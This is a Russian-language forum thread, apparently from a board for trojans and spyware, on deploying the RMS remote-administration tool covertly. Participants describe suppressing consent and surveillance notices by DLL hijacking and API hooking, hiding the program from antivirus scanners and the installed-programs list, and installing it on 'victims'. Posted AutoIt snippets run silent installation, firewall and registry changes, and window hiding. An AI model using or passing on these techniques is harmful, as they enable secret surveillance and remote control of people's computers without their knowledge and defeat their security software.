- Регистрация
- 14.05.2014
- Сообщения
- 399
- Репутация
в упор не вижу _самого_ файла. вижу только записи о нем, в автозапуск тоже он записывается, но самого его не видно... очень интересно.
RMS - полностью скрытая установка и управление.
- Автор темы NIN@
- Дата начала
- Регистрация
- 26.12.2012
- Сообщения
- 2 780
- Репутация
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
.Странно,что тут НОД чует его.
- Регистрация
- 03.06.2012
- Сообщения
- 6 101
- Репутация
Ситуация вообще немного странная, если АВ не детектят сам радмин, то вот его сборки спокойно могут попасть в немилость сканеров, про батник и нод уже сказано, Оутпост детектит офф. сборку как "RMS-инсталлер", НО если запустить сам радмин то автоматически добавит его в правила и пропустит в сеть и прочее-прочее...
Это про дефолтные настройки говорю !
Это про дефолтные настройки говорю !
- Регистрация
- 26.12.2012
- Сообщения
- 2 780
- Репутация
Всё-таки мы немного не до конца разобрали скрытую установку.Как-то всё в общих чертах.Первое:как убрать окошко с предупреждением и подтверждением отсылки ID?Вчера читал инфу по этому поводу,один говорит,что можно перепаковать установщик с помощью NSIS (как в той сборке).При создании нового дистрибутива можно контролировать все вызовы-алерты.Глянул этот NSIS-без сноровки особо не разберёшься.
Другой рекомендовал удалять окошки так (цитирую):
"Когда вываливается мессага,то из тела "rutserv.exe",или "rfusclient.exe",(не занималась детальным анализом,поэтому точно сказать не могу,но одинаковое присутствует в обеих файлах)вызвается апишка MessageBoxW и после нажатия отправить на мыльник данные для подключения в регистр eax заноситься значение 6,что говорит программе совершить требуемые действия.Для того что б исключить отображение сообщения и одновременно выслать письмецо,нужно каким то образом совершить перехват данной айпишки и в своём обработчике,не вызывая оригинального кода подставить в регистр eax правильный указатель.Прямой патчинг не подходит из за наличия цифровой подписи у файлов,остаётся внедрение своего кода в адресное пространство процесса.Самым простым и беспалёвным способом является использование уязвимости типа dll Hijacking.Суть уязвимости сводится к тому,что приложение не проверяет корректность путей при загрузки файлов в частности системных длл например и можно создать файл с одинаковым названием и поместить в одну директорию с программой и произойдёт загрузка.В этой своей дллке установить перехват посредством сплайсинга,или другими способами,придумано множество,один из самых простых сплайсинг,очень старый,но вполне подойдёт для такой прикладной задачи.Вот и вся метода.Из системных длл к примеру можно использовать rasadhlp.dll."
И снова,как-то в общих чертах.Плюс к этому рмс после установки появляется в пункте "Программы и компоненты".Так что юзер может свободно удалить.И наконец,это окошко о видеонаблюдении.
Nedovirus, небольшой ликбез можешь запилить?
Другой рекомендовал удалять окошки так (цитирую):
"Когда вываливается мессага,то из тела "rutserv.exe",или "rfusclient.exe",(не занималась детальным анализом,поэтому точно сказать не могу,но одинаковое присутствует в обеих файлах)вызвается апишка MessageBoxW и после нажатия отправить на мыльник данные для подключения в регистр eax заноситься значение 6,что говорит программе совершить требуемые действия.Для того что б исключить отображение сообщения и одновременно выслать письмецо,нужно каким то образом совершить перехват данной айпишки и в своём обработчике,не вызывая оригинального кода подставить в регистр eax правильный указатель.Прямой патчинг не подходит из за наличия цифровой подписи у файлов,остаётся внедрение своего кода в адресное пространство процесса.Самым простым и беспалёвным способом является использование уязвимости типа dll Hijacking.Суть уязвимости сводится к тому,что приложение не проверяет корректность путей при загрузки файлов в частности системных длл например и можно создать файл с одинаковым названием и поместить в одну директорию с программой и произойдёт загрузка.В этой своей дллке установить перехват посредством сплайсинга,или другими способами,придумано множество,один из самых простых сплайсинг,очень старый,но вполне подойдёт для такой прикладной задачи.Вот и вся метода.Из системных длл к примеру можно использовать rasadhlp.dll."
И снова,как-то в общих чертах.Плюс к этому рмс после установки появляется в пункте "Программы и компоненты".Так что юзер может свободно удалить.И наконец,это окошко о видеонаблюдении.
Nedovirus, небольшой ликбез можешь запилить?
- Регистрация
- 03.06.2012
- Сообщения
- 6 101
- Репутация
Ну а если использовать NSIS из той сборки как пример, хотя я предпочитаю больше самораспаковывающиеся архивы, мне так удобней ?
А у меня ещё вопрос может и нубский, но спрошу кто знает, где у RMS хранятся конфиги, т.е. как их менять: ID, пароль, почта куда нужно пересылать ID и т.д., что-то я не нашёл нигде...
А у меня ещё вопрос может и нубский, но спрошу кто знает, где у RMS хранятся конфиги, т.е. как их менять: ID, пароль, почта куда нужно пересылать ID и т.д., что-то я не нашёл нигде...
Интересная рекомендация, начал искать новый для себа термин и вот что нашёл на тему
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
гы-гы !
- Регистрация
- 30.06.2014
- Сообщения
- 178
- Репутация
ребят, помогите скрыть эту длл от антивируса
длл для скрытия банера о видеонаблюдении
просто закидываю ее в папку sysfiles, перезагружаюсь и банера нету , но работает только с жертвами без антивируса , антивирус к сожалению палит ее :с
и можно по подробнее насчет скрытия билда из билдера от нода ? :)
длл для скрытия банера о видеонаблюдении
просто закидываю ее в папку sysfiles, перезагружаюсь и банера нету , но работает только с жертвами без антивируса , антивирус к сожалению палит ее :с
и можно по подробнее насчет скрытия билда из билдера от нода ? :)
- Регистрация
- 03.06.2012
- Сообщения
- 6 101
- Репутация
Вот нашёл ещё совет, более наверное простой, запуск скриптом AutoIT:
Автоматически скроет окно !
Код:
;Запуск
RunWait('"' & $wind1 & 'rutserv.exe" /silentinstall', '', @SW_HIDE)
RunWait('"' & $wind1 & 'rutserv.exe" /firewall', '', @SW_HIDE)
RunWait('"' & $wind1 & 'regedit /s set.reg"', '', @SW_HIDE)
RunWait('"' & $wind1 & 'rutserv.exe" /start', '', @SW_HIDE)Автоматически скроет окно !
- Регистрация
- 03.06.2012
- Сообщения
- 6 101
- Репутация
Из простых, тот-же AutoIT, пример:
Код:
WinSetState($title, '', @SW_HIDE)Спрятать окошко, с заголовком. указанным в переменной $title !
| Автор темы | Похожие темы | Форум | Ответы | Дата |
|---|---|---|---|---|
| Y | Вопрос Люди кто может дать простинький rms builder на Delphi 7 ? | Трояны и шпионские программы | 2 | |
|
[Исходник] RMS HIS | Трояны и шпионские программы | 20 | |
| D | Чищеные файлы RMS-host 6.3.0.1 (без ID и вебки) | Трояны и шпионские программы | 26 |